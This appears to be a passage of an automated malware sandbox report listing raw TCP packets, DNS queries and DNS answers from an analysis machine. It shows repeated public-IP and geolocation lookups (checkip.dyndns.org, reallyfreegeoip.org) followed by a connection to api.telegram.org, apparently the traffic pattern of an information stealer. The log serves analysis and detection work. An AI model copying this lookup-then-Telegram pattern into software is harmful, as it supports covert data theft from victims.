                                                                                                          Oct 30, 2024 08:19:49.610152006 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.635246038 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:49.640739918 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.910387993 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.936325073 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.936436892 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.936543941 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.955605030 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.955641031 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:50.122411013 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:50.122483015 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:50.562041998 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:50.571362019 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:50.571420908 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:50.707113981 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:50.707194090 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:50.707279921 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:50.712393999 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:51.495322943 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:51.501250982 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:51.501348972 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:51.527453899 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:51.533175945 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:51.533235073 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:51.534768105 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:51.540098906 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:52.456062078 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:52.474574089 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:52.474610090 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:52.474673986 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:52.475090981 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:52.475104094 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:52.660592079 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:53.084640026 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.087738037 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:53.087764978 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.233055115 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.233129025 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.233500004 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:53.233711958 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:53.247162104 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:53.253024101 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.253247976 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:53.278207064 CET4916780192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:53.283561945 CET8049167132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.283629894 CET4916780192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:53.283766031 CET4916780192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:53.289019108 CET8049167132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.286794901 CET8049167132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.327297926 CET49168443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:54.327343941 CET44349168188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.327408075 CET49168443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:54.327814102 CET49168443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:54.327830076 CET44349168188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.501298904 CET4916780192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:54.502480030 CET8049167132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.502563000 CET4916780192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:54.936764956 CET44349168188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.939918041 CET49168443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:54.939951897 CET44349168188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.083251953 CET44349168188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.083306074 CET44349168188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.083375931 CET49168443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:55.083872080 CET49168443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:55.150722027 CET4916980192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:19:55.156151056 CET8049169158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.156232119 CET4916980192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:19:55.156331062 CET4916980192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:19:55.161608934 CET8049169158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.794917107 CET8049169158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.011091948 CET8049169158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.011163950 CET4916980192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:19:56.162053108 CET49170443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:56.162096977 CET44349170188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.162153006 CET49170443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:56.162878990 CET49170443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:56.162892103 CET44349170188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.801737070 CET44349170188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.804610014 CET49170443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:56.804635048 CET44349170188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.949464083 CET44349170188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.949529886 CET44349170188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.949728012 CET49170443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:56.950330019 CET49170443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:19:56.964378119 CET4916980192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:19:56.971153021 CET8049169158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.971246958 CET4916980192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:19:56.986974001 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:56.992388964 CET8049171193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.992500067 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:56.992698908 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:56.998954058 CET8049171193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:19:57.647878885 CET8049171193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:19:57.668644905 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:57.668692112 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:57.668745995 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:57.669152021 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:57.669171095 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:57.855251074 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:57.858486891 CET8049171193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:19:57.858544111 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:58.295665979 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.299200058 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:58.299226046 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.455643892 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.455709934 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.455801964 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:58.456334114 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:58.468502045 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:58.474318027 CET8049171193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.474384069 CET4917180192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:19:58.489639997 CET4917380192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:58.495170116 CET8049173132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.495258093 CET4917380192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:58.495301962 CET4917380192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:58.500610113 CET8049173132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:59.411719084 CET8049173132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:59.426464081 CET49174443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:59.426501989 CET44349174188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:59.426897049 CET49174443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:59.426898003 CET49174443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:59.426932096 CET44349174188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:59.619914055 CET4917380192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:20:00.056680918 CET44349174188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.059809923 CET49174443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:00.059885979 CET44349174188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.205331087 CET44349174188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.205389023 CET44349174188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.205452919 CET49174443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:00.205987930 CET49174443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:00.219136000 CET4917380192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:20:00.224975109 CET8049173132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.225074053 CET4917380192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:20:00.242638111 CET4917580192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:20:00.248140097 CET8049175132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.248215914 CET4917580192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:20:00.248311043 CET4917580192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:20:00.253691912 CET8049175132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.059225082 CET8049175132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.073084116 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:04.073141098 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.073225975 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:04.073566914 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:04.073615074 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.266915083 CET4917580192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:20:04.694581032 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.697715044 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:04.697772980 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.836515903 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.836581945 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.836674929 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:04.837172031 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:04.852015018 CET4917580192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:20:04.857876062 CET8049175132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.857960939 CET4917580192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:20:04.874797106 CET4917780192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:20:04.880409002 CET8049177193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.880565882 CET4917780192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:20:04.880839109 CET4917780192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:20:04.886321068 CET8049177193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:20:13.361326933 CET8049177193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:20:13.361421108 CET4917780192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:20:13.363066912 CET4917780192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:20:13.368577003 CET8049177193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:20:13.411485910 CET4917880192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:20:13.416934013 CET8049178193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:20:13.417062044 CET4917880192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:20:13.417202950 CET4917880192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:20:13.422508955 CET8049178193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.253120899 CET8049178193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.277338982 CET49179443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:14.277395010 CET44349179188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.277437925 CET49179443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:14.281842947 CET49179443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:14.281862020 CET44349179188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.462519884 CET8049178193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.462601900 CET4917880192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:20:14.890331984 CET44349179188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.906522989 CET49179443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:14.906549931 CET44349179188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.045491934 CET44349179188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.045557976 CET44349179188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.045645952 CET49179443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:15.046885967 CET49179443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:20:15.058495998 CET4917880192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:20:15.064354897 CET8049178193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.064439058 CET4917880192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:20:15.109354973 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:15.109400034 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.109472036 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:15.110327959 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:15.110341072 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.983716011 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.983828068 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:15.991347075 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:15.991360903 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.991919041 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:16.000616074 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:16.047323942 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:16.248277903 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:16.248383045 CET44349180149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:20:16.248456001 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:16.274863958 CET49180443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:20:59.438389063 CET8049167132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:20:59.438544989 CET4916780192.168.2.22132.226.8.169

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 08:19:46.349138021 CET5456253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:46.356524944 CET53545628.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:46.363117933 CET5291753192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET53529178.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:48.675617933 CET6275153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:48.686278105 CET53627518.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:51.505076885 CET5789353192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET53578938.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:51.519504070 CET5482153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET53548218.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:52.465361118 CET5471953192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:52.474083900 CET53547198.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.253221035 CET4988153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET53498818.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.263416052 CET5499853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET53549988.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:53.270745039 CET5499853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET53549988.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:54.315849066 CET5278153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:54.326879025 CET53527818.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.133069992 CET6392653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET53639268.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:55.143341064 CET6551053192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET53655108.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.150682926 CET6267253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:56.161493063 CET53626728.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.970468998 CET5647553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET53564758.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:56.979456902 CET4938453192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET53493848.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:57.657361984 CET5484253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:57.668102026 CET53548428.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.473483086 CET5810553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET53581058.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:58.482211113 CET6492853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET53649288.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:19:59.418051958 CET5739053192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:19:59.425887108 CET53573908.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.225334883 CET5809553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET53580958.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:00.234802008 CET5426153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET53542618.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.065165997 CET6050753192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:04.072565079 CET53605078.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.857805967 CET5044653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET53504468.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:04.867367029 CET5593953192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET53559398.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:13.391597986 CET4960853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET53496088.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:13.403914928 CET6148653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET53614868.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:14.268533945 CET6245353192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:14.276907921 CET53624538.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:20:15.101547956 CET5056853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:20:15.108767033 CET53505688.8.8.8192.168.2.22

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 08:19:46.349138021 CET192.168.2.228.8.8.80x37f5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.363117933 CET192.168.2.228.8.8.80xed14Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:48.675617933 CET192.168.2.228.8.8.80xd3a2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.505076885 CET192.168.2.228.8.8.80x7949Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.519504070 CET192.168.2.228.8.8.80x25d7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:52.465361118 CET192.168.2.228.8.8.80xe995Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.253221035 CET192.168.2.228.8.8.80x5eeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.263416052 CET192.168.2.228.8.8.80x54b3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270745039 CET192.168.2.228.8.8.80x54b3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:54.315849066 CET192.168.2.228.8.8.80xda4dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.133069992 CET192.168.2.228.8.8.80x5e4aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.143341064 CET192.168.2.228.8.8.80x9d2fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.150682926 CET192.168.2.228.8.8.80x2c0fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.970468998 CET192.168.2.228.8.8.80x4e7dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.979456902 CET192.168.2.228.8.8.80x496fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:57.657361984 CET192.168.2.228.8.8.80x9000Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.473483086 CET192.168.2.228.8.8.80xed38Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.482211113 CET192.168.2.228.8.8.80xbbe3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:59.418051958 CET192.168.2.228.8.8.80x7350Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.225334883 CET192.168.2.228.8.8.80xb487Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.234802008 CET192.168.2.228.8.8.80x5783Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.065165997 CET192.168.2.228.8.8.80x1916Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.857805967 CET192.168.2.228.8.8.80x47ebStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.867367029 CET192.168.2.228.8.8.80xd6b2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.391597986 CET192.168.2.228.8.8.80x4ac7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.403914928 CET192.168.2.228.8.8.80x2a15Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:14.268533945 CET192.168.2.228.8.8.80x12b1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:15.101547956 CET192.168.2.228.8.8.80x7160Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 08:19:46.356524944 CET8.8.8.8192.168.2.220x37f5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.356524944 CET8.8.8.8192.168.2.220x37f5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.356524944 CET8.8.8.8192.168.2.220x37f5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.356524944 CET8.8.8.8192.168.2.220x37f5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
